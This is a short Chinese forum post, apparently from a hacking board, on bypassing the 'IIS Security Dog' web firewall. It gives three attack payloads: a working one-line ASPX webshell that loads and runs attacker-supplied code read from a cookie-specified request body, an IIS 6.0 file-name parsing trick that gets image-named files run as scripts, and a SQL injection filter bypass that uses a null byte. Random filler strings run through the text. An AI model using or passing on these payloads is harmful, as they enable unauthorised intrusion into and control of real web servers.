1、绕过IIS安全狗的一句话。
9 j! r" O# `; Z5 n, ~5 q前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。+ R& n6 |6 Q3 [( m8 R# @- [
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。0 ?/ ~- g4 |, M/ C
2 i3 [5 C" [# [# ?/ C, K
2、IIS6.0解析漏洞遇到安全狗。
" v& d) y2 A1 |& f% U; D. _- e文件名为* I. _, c! A% b
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
$ I; _7 t! D( L1 a. f! p- j+ \3 v3 C) i, i. {
这样的会被IIS安全狗果断屏蔽。
5 E1 t+ ?- U* T' U1 c. g& O( W" U1 c改成如下名称,IIS6一样会解析:
* V- `7 o0 N# o/ Q1 y2 cwww.xxxxx.com/;1.asp;1.jpg6 j) W e f1 Z
( W4 H: C2 X. a# Q' v e: B3、安全狗的注入绕过。) l# m3 T4 u3 A) v: Y1 S' Y" q
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
; [5 D4 \! @1 e8 U/ B2 _但如果:
. r$ a3 o# e1 F R9 Yr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1! H, |) \0 D s8 n7 T! t
就可以成功绕过了。
% K+ c3 T8 A N" y [. N" y
9 ` G4 m- ?; z; M& X* C) r# \( _1 Q# Q. `
|
发表于 2012-10-31 08:25:30
收藏
分享
支持
反对